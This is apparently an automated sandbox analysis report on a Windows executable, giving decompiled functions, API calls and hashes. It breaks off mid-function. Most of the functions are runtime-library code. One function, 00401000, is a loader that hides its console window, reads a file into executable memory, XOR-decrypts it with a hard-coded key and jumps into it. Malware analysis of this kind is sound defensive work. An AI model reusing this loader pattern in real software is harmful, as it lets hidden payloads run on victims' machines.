                                                              0x0040c5ab
                                                              0x0040c593
                                                              0x0040c4ee
                                                              0x0040c4f1
                                                              0x0040c50c
                                                              0x0040c511
                                                              0x0040c517
                                                              0x0040c519
                                                              0x0040c524
                                                              0x0040c524
                                                              0x00000000
                                                              0x0040c519
                                                              0x0040c472
                                                              0x0040c479
                                                              0x0040c47b
                                                              0x0040c4b2
                                                              0x0040c4b2
                                                              0x0040c4bc
                                                              0x0040c4bf
                                                              0x0040c4c6
                                                              0x0040c4c6
                                                              0x0040c4c6
                                                              0x0040c4d2
                                                              0x00000000
                                                              0x0040c4d2
                                                              0x0040c47d
                                                              0x0040c481
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c483
                                                              0x0040c492
                                                              0x0040c497
                                                              0x0040c49a
                                                              0x0040c49b
                                                              0x0040c49e
                                                              0x0040c49e
                                                              0x0040c4a5
                                                              0x0040c4a7
                                                              0x0040c4aa
                                                              0x0040c4ad
                                                              0x0040c4b0
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040c410
                                                              0x0040c415
                                                              0x0040c418
                                                              0x0040c41f
                                                              0x00000000
                                                              0x0040c41f
                                                              0x0040c3e9
                                                              0x0040c3ee
                                                              0x0040c3f4
                                                              0x0040c3f6
                                                              0x00000000
                                                              0x0040c3fb

                                                              APIs
                                                                • Part of subcall function 0040C070: CreateFileW.KERNELBASE(?,00000000,?,0040C460,?,?,00000000,?,0040C460,?,0000000C), ref: 0040C08D
                                                              • GetLastError.KERNEL32 ref: 0040C4CB
                                                              • __dosmaperr.LIBCMT ref: 0040C4D2
                                                              • GetFileType.KERNELBASE(00000000), ref: 0040C4DE
                                                              • GetLastError.KERNEL32 ref: 0040C4E8
                                                              • __dosmaperr.LIBCMT ref: 0040C4F1
                                                              • CloseHandle.KERNEL32(00000000), ref: 0040C511
                                                              • CloseHandle.KERNEL32(00407F4C), ref: 0040C65E
                                                              • GetLastError.KERNEL32 ref: 0040C690
                                                              • __dosmaperr.LIBCMT ref: 0040C697
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                              • String ID: H
                                                              • API String ID: 4237864984-2852464175
                                                              • Opcode ID: 02834435bf5dd621a605c359c7cb1ccf834e235c87be511bd0bf7476f94e693c
                                                              • Instruction ID: 74d71066eb577f9082b26780235b5dbbe16e0fe86ef76fded194978a4361ce27
                                                              • Opcode Fuzzy Hash: 02834435bf5dd621a605c359c7cb1ccf834e235c87be511bd0bf7476f94e693c
                                                              • Instruction Fuzzy Hash: FEA11532E141549FCF199F68DC91BAE3BA1AB06314F14426EF811BB3D1CB399852CB59
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407550 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 69 407550-407560 70 407562-407575 call 407b57 call 407b6a 69->70 71 40757a-40757c 69->71 87 4078d4 70->87 73 407582-407588 71->73 74 4078bc-4078c9 call 407b57 call 407b6a 71->74 73->74 77 40758e-4075b7 73->77 92 4078cf call 406567 74->92 77->74 80 4075bd-4075c6 77->80 83 4075e0-4075e2 80->83 84 4075c8-4075db call 407b57 call 407b6a 80->84 85 4078b8-4078ba 83->85 86 4075e8-4075ec 83->86 84->92 91 4078d7-4078da 85->91 86->85 90 4075f2-4075f6 86->90 87->91 90->84 94 4075f8-40760f 90->94 92->87 97 407611-407614 94->97 98 407644-40764a 94->98 100 407616-40761c 97->100 101 40763a-407642 97->101 102 40764c-407653 98->102 103 40761e-407635 call 407b57 call 407b6a call 406567 98->103 100->101 100->103 107 4076b7-4076d6 101->107 104 407655 102->104 105 407657-407675 call 40a6a3 call 408694 * 2 102->105 134 4077ef 103->134 104->105 139 407692-4076b5 call 4068d4 105->139 140 407677-40768d call 407b6a call 407b57 105->140 108 407792-40779b call 40bb62 107->108 109 4076dc-4076e8 107->109 123 40780c 108->123 124 40779d-4077af 108->124 109->108 112 4076ee-4076f0 109->112 112->108 116 4076f6-407717 112->116 116->108 120 407719-40772f 116->120 120->108 125 407731-407733 120->125 127 407810-407826 ReadFile 123->127 124->123 129 4077b1-4077c0 GetConsoleMode 124->129 125->108 130 407735-407758 125->130 132 407884-40788f GetLastError 127->132 133 407828-40782e 127->133 129->123 135 4077c2-4077c6 129->135 130->108 138 40775a-407770 130->138 141 407891-4078a3 call 407b6a call 407b57 132->141 142 4078a8-4078ab 132->142 133->132 143 407830 133->143 137 4077f2-4077fc call 408694 134->137 135->127 136 4077c8-4077e0 ReadConsoleW 135->136 144 407801-40780a 136->144 145 4077e2 GetLastError 136->145 137->91 138->108 149 407772-407774 138->149 139->107 140->134 141->134 146 4078b1-4078b3 142->146 147 4077e8-4077ee call 407b10 142->147 153 407833-407845 143->153 144->153 145->147 146->137 147->134 149->108 156 407776-40778d 149->156 153->137 160 407847-40784b 153->160 156->108 161 407864-407871 160->161 162 40784d-40785d call 407262 160->162 168 407873 call 4073b9 161->168 169 40787d-407882 call 4070a8 161->169 174 407860-407862 162->174 175 407878-40787b 168->175 169->175 174->137 175->174
                                                              C-Code - Quality: 78%
                                                              			E00407550(signed int _a4, void* _a8, unsigned int _a12) {
				signed int _v5;
				signed int _v12;
				void* _v16;
				signed int _v20;
				void* _v24;
				long _v28;
				char _v32;
				void* _v36;
				long _v40;
				signed int* _t127;
				signed int _t129;
				signed int _t130;
				intOrPtr _t133;
				signed int _t136;
				signed int _t138;
				signed char _t140;
				intOrPtr _t148;
				long _t150;
				signed int _t151;
				signed int _t152;
				signed int _t154;
				long _t155;
				intOrPtr _t160;
				signed int _t161;
				intOrPtr _t163;
				signed int _t165;
				signed int _t167;
				char _t169;
				char _t174;
				char _t179;
				signed char _t186;
				long _t192;
				signed int _t196;
				signed char _t197;
				signed int _t198;
				long _t200;
				intOrPtr _t202;
				void* _t203;
				unsigned int _t206;
				signed int _t208;
				char* _t210;
				char* _t211;
				char* _t212;
				signed int _t215;
				long _t216;
				signed int _t217;
				signed int _t218;
				signed int _t225;
				signed int _t226;
				void* _t230;
				void* _t232;
				void* _t233;
				void* _t234;

				_t215 = _a4;
				_t233 = _t232 - 0x24;
				if(_t215 != 0xfffffffe) {
					__eflags = _t215;
					if(_t215 < 0) {
						L58:
						_t127 = E00407B57();
						 *_t127 =  *_t127 & 0x00000000;
						__eflags =  *_t127;
						 *((intOrPtr*)(E00407B6A())) = 9;
						L59:
						_t129 = E00406567();
						goto L60;
					}
					__eflags = _t215 -  *0x4190c0; // 0x40
					if(__eflags >= 0) {
						goto L58;
					}
					_t196 = _t215 >> 6;
					_t225 = (_t215 & 0x0000003f) * 0x38;
					_v12 = _t196;
					_v32 = 1;
					_t133 =  *((intOrPtr*)(0x418ec0 + _t196 * 4));
					_v20 = _t225;
					_t197 =  *((intOrPtr*)(_t225 + _t133 + 0x28));
					_v5 = _t197;
					__eflags = 1 & _t197;
					if((1 & _t197) == 0) {
						goto L58;
					}
					_t198 = _a12;
					__eflags = _t198 - 0x7fffffff;
					if(_t198 <= 0x7fffffff) {
						__eflags = _t198;
						if(_t198 == 0) {
							L57:
							_t130 = 0;
							goto L61;
						}
						__eflags = _v5 & 0x00000002;
						if((_v5 & 0x00000002) != 0) {
							goto L57;
						}
						__eflags = _a8;
						if(_a8 == 0) {
							goto L6;
						}
						_t136 =  *((intOrPtr*)(_t225 + _t133 + 0x29));
						_v5 = _t136;
						_v24 =  *((intOrPtr*)(_t225 + _t133 + 0x18));
						_t230 = 0;
						_t138 = _t136 - 1;
						__eflags = _t138;
						if(_t138 == 0) {
							_t140 =  !_t198;
							__eflags = 1 & _t140;
							if((1 & _t140) == 0) {
								L13:
								 *(E00407B57()) =  *_t141 & _t230;
								 *((intOrPtr*)(E00407B6A())) = 0x16;
								E00406567();
								goto L38;
							} else {
								_t200 = _t198 >> 1;
								_t192 = 4;
								__eflags = _t200 - 1;
								if(_t200 >= 1) {
									_t192 = _t200;
								}
								_t230 = E0040A6A3(_t192);
								E00408694(0);
								E00408694(0);
								_t234 = _t233 + 0xc;
								_v16 = _t230;
								__eflags = _t230;
								if(_t230 != 0) {
									_t148 = E004068D4(_t215, _a4, 0, 0, 1);
									_t233 = _t234 + 0x10;
									_t202 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									 *((intOrPtr*)(_t225 + _t202 + 0x20)) = _t148;
									 *(_t225 + _t202 + 0x24) = _t215;
									_t203 = _t230;
									L21:
									_t225 = 0;
									_v36 = _t203;
									_t150 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									_v28 = _t150;
									_t216 = _t150;
									_t151 = _v20;
									__eflags =  *(_t151 + _t216 + 0x28) & 0x00000048;
									_t217 = _a4;
									if(( *(_t151 + _t216 + 0x28) & 0x00000048) != 0) {
										_t169 =  *((intOrPtr*)(_t151 + _v28 + 0x2a));
										_t210 = _v16;
										__eflags = _t169 - 0xa;
										if(_t169 != 0xa) {
											__eflags = _t192;
											if(_t192 != 0) {
												_t225 = 1;
												 *_t210 = _t169;
												_t211 = _t210 + 1;
												_t192 = _t192 - 1;
												__eflags = _v5;
												_v16 = _t211;
												 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2a)) = 0xa;
												_t217 = _a4;
												if(_v5 != 0) {
													_t174 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b));
													_t217 = _a4;
													__eflags = _t174 - 0xa;
													if(_t174 != 0xa) {
														__eflags = _t192;
														if(_t192 != 0) {
															 *_t211 = _t174;
															_t212 = _t211 + 1;
															_t192 = _t192 - 1;
															__eflags = _v5 - 1;
															_v16 = _t212;
															_t225 = 2;
															 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2b)) = 0xa;
															_t217 = _a4;
															if(_v5 == 1) {
																_t179 =  *((intOrPtr*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c));
																_t217 = _a4;
																__eflags = _t179 - 0xa;
																if(_t179 != 0xa) {
																	__eflags = _t192;
																	if(_t192 != 0) {
																		 *_t212 = _t179;
																		_t192 = _t192 - 1;
																		__eflags = _t192;
																		_v16 = _t212 + 1;
																		_t225 = 3;
																		 *((char*)(_v20 +  *((intOrPtr*)(0x418ec0 + _v12 * 4)) + 0x2c)) = 0xa;
																	}
																}
															}
														}
													}
												}
											}
										}
									}
									_t152 = E0040BB62(_t217);
									__eflags = _t152;
									if(_t152 == 0) {
										L41:
										_v32 = 0;
										L42:
										_t193 = _v16;
										_t154 = ReadFile(_v24, _v16, _t192,  &_v28, 0); // executed
										__eflags = _t154;
										if(_t154 == 0) {
											L53:
											_t155 = GetLastError();
											_t225 = 5;
											__eflags = _t155 - _t225;
											if(_t155 != _t225) {
												__eflags = _t155 - 0x6d;
												if(_t155 != 0x6d) {
													L37:
													E00407B10(_t155);
													goto L38;
												}
												_t226 = 0;
												goto L39;
											}
											 *((intOrPtr*)(E00407B6A())) = 9;
											 *(E00407B57()) = _t225;
											goto L38;
										}
										_t206 = _a12;
										__eflags = _v28 - _t206;
										if(_v28 > _t206) {
											goto L53;
										}
										_t226 = _t225 + _v28;
										__eflags = _t226;
										L45:
										_t218 = _v20;
										_t160 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
										__eflags =  *((char*)(_t218 + _t160 + 0x28));
										if( *((char*)(_t218 + _t160 + 0x28)) < 0) {
											__eflags = _v5 - 2;
											if(_v5 == 2) {
												__eflags = _v32;
												_push(_t226 >> 1);
												_push(_v36);
												_push(_a4);
												if(_v32 == 0) {
													_t161 = E004070A8();
												} else {
													_t161 = E004073B9(_t206);
												}
											} else {
												_t207 = _t206 >> 1;
												__eflags = _t206 >> 1;
												_t161 = E00407262(_t206 >> 1, _t206 >> 1, _a4, _t193, _t226, _a8, _t207);
											}
											_t226 = _t161;
										}
										goto L39;
									}
									_t208 = _v20;
									_t163 =  *((intOrPtr*)(0x418ec0 + _v12 * 4));
									__eflags =  *((char*)(_t208 + _t163 + 0x28));
									if( *((char*)(_t208 + _t163 + 0x28)) >= 0) {
										goto L41;
									}
									_t165 = GetConsoleMode(_v24,  &_v40);
									__eflags = _t165;
									if(_t165 == 0) {
										goto L41;
									}
									__eflags = _v5 - 2;
									if(_v5 != 2) {
										goto L42;
									}
									_t193 = _v16;
									_t167 = ReadConsoleW(_v24, _v16, _t192 >> 1,  &_v28, 0);
									__eflags = _t167;
									if(_t167 != 0) {
										_t206 = _a12;
										_t226 = _t225 + _v28 * 2;
										goto L45;
									}
									_t155 = GetLastError();
									goto L37;
								} else {
									 *((intOrPtr*)(E00407B6A())) = 0xc;
									 *(E00407B57()) = 8;
									L38:
									_t226 = _t225 | 0xffffffff;
									__eflags = _t226;
									L39:
									E00408694(_t230);
									_t130 = _t226;
									goto L61;
								}
							}
						}
						__eflags = _t138 != 1;
						if(_t138 != 1) {
							L14:
							_t192 = _t198;
							_t203 = _a8;
							_v16 = _t203;
							goto L21;
						}
						_t186 =  !_t198;
						__eflags = 1 & _t186;
						if((1 & _t186) != 0) {
							goto L14;
						}
						goto L13;
					}
					L6:
					 *(E00407B57()) =  *_t134 & 0x00000000;
					 *((intOrPtr*)(E00407B6A())) = 0x16;
					goto L59;
				} else {
					 *(E00407B57()) =  *_t187 & 0x00000000;
					_t129 = E00407B6A();
					 *_t129 = 9;
					L60:
					_t130 = _t129 | 0xffffffff;
					L61:
					return _t130;
				}
			}
























































                                                              0x00407555
                                                              0x00407558
                                                              0x00407560
                                                              0x0040757a
                                                              0x0040757c
                                                              0x004078bc
                                                              0x004078bc
                                                              0x004078c1
                                                              0x004078c1
                                                              0x004078c9
                                                              0x004078cf
                                                              0x004078cf
                                                              0x00000000
                                                              0x004078cf
                                                              0x00407582
                                                              0x00407588
                                                              0x00000000
                                                              0x00000000
                                                              0x00407592
                                                              0x00407598
                                                              0x0040759d
                                                              0x004075a1
                                                              0x004075a4
                                                              0x004075ab
                                                              0x004075ae
                                                              0x004075b2
                                                              0x004075b5
                                                              0x004075b7
                                                              0x00000000
                                                              0x00000000
                                                              0x004075bd
                                                              0x004075c0
                                                              0x004075c6
                                                              0x004075e0
                                                              0x004075e2
                                                              0x004078b8
                                                              0x004078b8
                                                              0x00000000
                                                              0x004078b8
                                                              0x004075e8
                                                              0x004075ec
                                                              0x00000000
                                                              0x00000000
                                                              0x004075f2
                                                              0x004075f6
                                                              0x00000000
                                                              0x00000000
                                                              0x004075fd
                                                              0x00407601
                                                              0x00407604
                                                              0x00407607
                                                              0x0040760c
                                                              0x0040760c
                                                              0x0040760f
                                                              0x00407646
                                                              0x00407648
                                                              0x0040764a
                                                              0x0040761e
                                                              0x00407623
                                                              0x0040762a
                                                              0x00407630
                                                              0x00000000
                                                              0x0040764c
                                                              0x0040764e
                                                              0x00407650
                                                              0x00407651
                                                              0x00407653
                                                              0x00407655
                                                              0x00407655
                                                              0x0040765f
                                                              0x00407661
                                                              0x00407668
                                                              0x0040766d
                                                              0x00407670
                                                              0x00407673
                                                              0x00407675
                                                              0x0040769b
                                                              0x004076a3
                                                              0x004076a6
                                                              0x004076ad
                                                              0x004076b1
                                                              0x004076b5
                                                              0x004076b7
                                                              0x004076ba
                                                              0x004076bc
                                                              0x004076bf
                                                              0x004076c6
                                                              0x004076c9
                                                              0x004076cb
                                                              0x004076ce
                                                              0x004076d3
                                                              0x004076d6
                                                              0x004076df
                                                              0x004076e3
                                                              0x004076e6
                                                              0x004076e8
                                                              0x004076ee
                                                              0x004076f0
                                                              0x004076f9
                                                              0x004076fa
                                                              0x004076fc
                                                              0x00407700
                                                              0x00407701
                                                              0x00407705
                                                              0x0040770f
                                                              0x00407714
                                                              0x00407717
                                                              0x00407726
                                                              0x0040772a
                                                              0x0040772d
                                                              0x0040772f
                                                              0x00407731
                                                              0x00407733
                                                              0x00407738
                                                              0x0040773a
                                                              0x0040773e
                                                              0x0040773f
                                                              0x00407745
                                                              0x0040774f
                                                              0x00407750
                                                              0x00407755
                                                              0x00407758
                                                              0x00407767
                                                              0x0040776b
                                                              0x0040776e
                                                              0x00407770
                                                              0x00407772
                                                              0x00407774
                                                              0x00407776
                                                              0x0040777c
                                                              0x0040777c
                                                              0x0040777d
                                                              0x0040778c
                                                              0x0040778d
                                                              0x0040778d
                                                              0x00407774
                                                              0x00407770
                                                              0x00407758
                                                              0x00407733
                                                              0x0040772f
                                                              0x00407717
                                                              0x004076f0
                                                              0x004076e8
                                                              0x00407793
                                                              0x00407799
                                                              0x0040779b
                                                              0x0040780c
                                                              0x0040780c
                                                              0x00407810
                                                              0x00407817
                                                              0x0040781e
                                                              0x00407824
                                                              0x00407826
                                                              0x00407884
                                                              0x00407884
                                                              0x0040788c
                                                              0x0040788d
                                                              0x0040788f
                                                              0x004078a8
                                                              0x004078ab
                                                              0x004077e8
                                                              0x004077e9
                                                              0x00000000
                                                              0x004077ee
                                                              0x004078b1
                                                              0x00000000
                                                              0x004078b1
                                                              0x00407896
                                                              0x004078a1
                                                              0x00000000
                                                              0x004078a1
                                                              0x00407828
                                                              0x0040782b
                                                              0x0040782e
                                                              0x00000000
                                                              0x00000000
                                                              0x00407830
                                                              0x00407830
                                                              0x00407833
                                                              0x00407836
                                                              0x00407839
                                                              0x00407840
                                                              0x00407845
                                                              0x00407847
                                                              0x0040784b
                                                              0x00407866
                                                              0x0040786a
                                                              0x0040786b
                                                              0x0040786e
                                                              0x00407871
                                                              0x0040787d
                                                              0x00407873
                                                              0x00407873
                                                              0x00407873
                                                              0x0040784d
                                                              0x0040784d
                                                              0x0040784d
                                                              0x00407858
                                                              0x0040785d
                                                              0x00407860
                                                              0x00407860
                                                              0x00000000
                                                              0x00407845
                                                              0x004077a0
                                                              0x004077a3
                                                              0x004077aa
                                                              0x004077af
                                                              0x00000000
                                                              0x00000000
                                                              0x004077b8
                                                              0x004077be
                                                              0x004077c0
                                                              0x00000000
                                                              0x00000000
                                                              0x004077c2
                                                              0x004077c6
                                                              0x00000000
                                                              0x00000000
                                                              0x004077d1
                                                              0x004077d8
                                                              0x004077de
                                                              0x004077e0
                                                              0x00407804
                                                              0x00407807
                                                              0x00000000
                                                              0x00407807
                                                              0x004077e2
                                                              0x00000000
                                                              0x00407677
                                                              0x0040767c
                                                              0x00407687
                                                              0x004077ef
                                                              0x004077ef
                                                              0x004077ef
                                                              0x004077f2
                                                              0x004077f3
                                                              0x004077f9
                                                              0x00000000
                                                              0x004077fb
                                                              0x00407675
                                                              0x0040764a
                                                              0x00407611
                                                              0x00407614
                                                              0x0040763a
                                                              0x0040763a
                                                              0x0040763c
                                                              0x0040763f
                                                              0x00000000
                                                              0x0040763f
                                                              0x00407618
                                                              0x0040761a
                                                              0x0040761c
                                                              0x00000000
                                                              0x00000000
                                                              0x00000000
                                                              0x0040761c
                                                              0x004075c8
                                                              0x004075cd
                                                              0x004075d5
                                                              0x00000000
                                                              0x00407562
                                                              0x00407567
                                                              0x0040756a
                                                              0x0040756f
                                                              0x004078d4
                                                              0x004078d4
                                                              0x004078d7
                                                              0x004078da
                                                              0x004078da

                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 22a9856fe5a84c914d3423994c03e57bce606a7f667d03dc960a7c5f7eeaf21b
                                                              • Instruction ID: 4cb50bf577c926ab878105439c0c79d212d035fb132a4d6a04cd545261c119c9
                                                              • Opcode Fuzzy Hash: 22a9856fe5a84c914d3423994c03e57bce606a7f667d03dc960a7c5f7eeaf21b
                                                              • Instruction Fuzzy Hash: C5B1D471E08245ABDB01EF69C844BAE7BB1BF45318F14817AE501B73D2C778B941CB6A
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00401000 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74memoryCOMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              C-Code - Quality: 77%
                                                              			E00401000(intOrPtr _a8) {
				signed int _v8;
				intOrPtr _v12;
				long _v16;
				void* _v20;
				char* _v24;
				struct HWND__* _t32;
				intOrPtr _t36;
				long _t39;
				void* _t42;
				void* _t51;
				void* _t68;

				_v8 = 0;
				_v16 = 0;
				_v24 = "248058040134";
				__imp__GetConsoleWindow(); // executed
				ShowWindow(_t32, 0); // executed
				_t36 = E00404813( *((intOrPtr*)(_a8 + (4 << 0))), 0x4188c0); // executed
				_v12 = _t36;
				E00404B74(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12, 0, 2); // executed
				_t39 = E0040472C(_t51,  *((intOrPtr*)(_a8 + (4 << 0))), _t68, _v12); // executed
				_v16 = _t39;
				E00404B74(_t51, _v12, _t68, _v12, 0, 0); // executed
				_t42 = VirtualAlloc(0, _v16, 0x3000, 0x40); // executed
				_v20 = _t42;
				E00404D87(_v20, _v16, 1, _v12); // executed
				while(_v8 < _v16) {
					asm("cdq");
					 *(_v20 + _v8) =  *(_v20 + _v8) & 0x000000ff ^ _v24[_v8 % 0xc] & 0x000000ff;
					_v8 = _v8 + 1;
				}
				goto __eax;
			}














                                                              0x00401006
                                                              0x0040100d
                                                              0x00401014
                                                              0x0040101d
                                                              0x00401024
                                                              0x0040103e
                                                              0x00401046
                                                              0x00401051
                                                              0x0040105d
                                                              0x00401065
                                                              0x00401070
                                                              0x00401085
                                                              0x0040108b
                                                              0x0040109c
                                                              0x004010a4
                                                              0x004010af
                                                              0x004010cf
                                                              0x004010d7
                                                              0x004010d7
                                                              0x004010df

                                                              APIs
                                                              • GetConsoleWindow.KERNELBASE(00000000), ref: 0040101D
                                                              • ShowWindow.USER32(00000000), ref: 00401024
                                                              • VirtualAlloc.KERNELBASE(00000000,00000000,00003000,00000040), ref: 00401085
                                                              • __fread_nolock.LIBCMT ref: 0040109C
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: Window$AllocConsoleShowVirtual__fread_nolock
                                                              • String ID: 248058040134
                                                              • API String ID: 494509129-1212554544
                                                              • Opcode ID: 19d58178e4c398fc293a5b7b4affa2899e16e4478cbb19e134bbc2de42f9a9e8
                                                              • Instruction ID: d385b19f01a63246e9d2131daafd262a5444be4d06afd6f0719cf4670e1aff75
                                                              • Opcode Fuzzy Hash: 19d58178e4c398fc293a5b7b4affa2899e16e4478cbb19e134bbc2de42f9a9e8
                                                              • Instruction Fuzzy Hash: 2D214CB5E00208FFDB04DBD4C851FEEBBB5AF84304F1084A9E611AB2D1D779AA40CB54
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00409AD3 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              C-Code - Quality: 19%
                                                              			E00409AD3() {
				intOrPtr _v8;
				signed int _v12;
				WCHAR* _t5;
				void* _t6;
				intOrPtr _t9;
				WCHAR* _t10;
				WCHAR* _t19;
				WCHAR* _t26;
				WCHAR* _t29;

				_push(_t21);
				_t5 = GetEnvironmentStringsW();
				_t29 = _t5;
				if(_t29 != 0) {
					_t6 = E00409A9C(_t29);
					_t19 = 0;
					_v12 = _t6 - _t29 >> 1;
					_t9 = E00409A30(0, 0, _t29, _t6 - _t29 >> 1, 0, 0, 0, 0);
					_v8 = _t9;
					if(_t9 != 0) {
						_t10 = E0040A6A3(_t9); // executed
						_t26 = _t10;
						_push(0);
						if(_t26 != 0) {
							_push(0);
							_push(_v8);
							_push(_t26);
							_push(_v12);
							_push(_t29);
							_push(0);
							_push(0);
							if(E00409A30() != 0) {
								E00408694(0);
								_t19 = _t26;
							} else {
								E00408694(_t26);
							}
							FreeEnvironmentStringsW(_t29);
							_t5 = _t19;
						} else {
							E00408694();
							FreeEnvironmentStringsW(_t29);
							_t5 = 0;
						}
					} else {
						FreeEnvironmentStringsW(_t29);
						_t5 = 0;
					}
				}
				return _t5;
			}












                                                              0x00409ad9
                                                              0x00409adb
                                                              0x00409ae1
                                                              0x00409ae5
                                                              0x00409aed
                                                              0x00409af2
                                                              0x00409b00
                                                              0x00409b03
                                                              0x00409b0b
                                                              0x00409b10
                                                              0x00409b1f
                                                              0x00409b24
                                                              0x00409b27
                                                              0x00409b2a
                                                              0x00409b3d
                                                              0x00409b3e
                                                              0x00409b41
                                                              0x00409b42
                                                              0x00409b45
                                                              0x00409b46
                                                              0x00409b47
                                                              0x00409b52
                                                              0x00409b5d
                                                              0x00409b62
                                                              0x00409b54
                                                              0x00409b55
                                                              0x00409b55
                                                              0x00409b66
                                                              0x00409b6c
                                                              0x00409b2c
                                                              0x00409b2c
                                                              0x00409b33
                                                              0x00409b39
                                                              0x00409b39
                                                              0x00409b12
                                                              0x00409b13
                                                              0x00409b19
                                                              0x00409b19
                                                              0x00409b6f
                                                              0x00409b72

                                                              APIs
                                                              • GetEnvironmentStringsW.KERNEL32 ref: 00409ADB
                                                                • Part of subcall function 00409A30: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,0040DBAF,?,00000000,-00000008), ref: 00409A91
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409B13
                                                              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 00409B33
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.321408204.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.321402306.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321436943.0000000000411000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                              • Associated: 00000001.00000002.321447961.0000000000418000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_eixfhzlwqd.jbxd
                                                              Similarity
                                                              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                                                              • String ID:
                                                              • API String ID: 158306478-0
                                                              • Opcode ID: 404120b7f7e6ebd39d8f263fc420f8e95c0482064b35d850a2c83176029c21cd
                                                              • Instruction ID: 31a707e6441ba5eb713ba2804f900e652010e3fd9620adc368c091045ee47f5b
                                                              • Opcode Fuzzy Hash: 404120b7f7e6ebd39d8f263fc420f8e95c0482064b35d850a2c83176029c21cd
                                                              • Instruction Fuzzy Hash: 5411E5A1A016197EE71127B2AC89CBF7E6CEE842A8710043BF541B1183EE3CED41857D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00407991 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                              Download Yara Rule

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 217 407991-407996 218 407998-4079b0 217->218 219 4079b2-4079b6 218->219 220 4079be-4079c7 218->220 219->220 221 4079b8-4079bc 219->221 222 4079d9 220->222 223 4079c9-4079cc 220->223 224 407a33-407a37 221->224 227 4079db-4079e8 GetStdHandle 222->227 225 4079d5-4079d7 223->225 226 4079ce-4079d3 223->226 224->218 228 407a3d-407a40 224->228 225->227 226->227 229 407a15-407a27 227->229 230 4079ea-4079ec 227->230 229->224 231 407a29-407a2c 229->231 230->229 232 4079ee-4079f7 GetFileType 230->232 231->224 232->229 233 4079f9-407a02 232->233 234 407a04-407a08 233->234 235 407a0a-407a0d 233->235 234->224 235->224 236 407a0f-407a13 235->236 236->224
                                                              C-Code - Quality: 86%
                                                              			E00407991() {
				signed int _t20;
				signed int _t22;
				long _t23;
				signed char _t25;
				void* _t28;
				signed int _t31;
				void* _t33;

				_t31 = 0;
				do {
					_t20 = _t31 & 0x0000003f;
					_t33 = _t20 * 0x38 +  *((intOrPtr*)(0x418ec0 + (_t31 >> 6) * 4));
					if( *(_t33 + 0x18) == 0xffffffff ||  *(_t33 + 0x18) == 0xfffffffe) {
						 *(_t33 + 0x28) = 0x81;
						_t22 = _t31;
						if(_t22 == 0) {
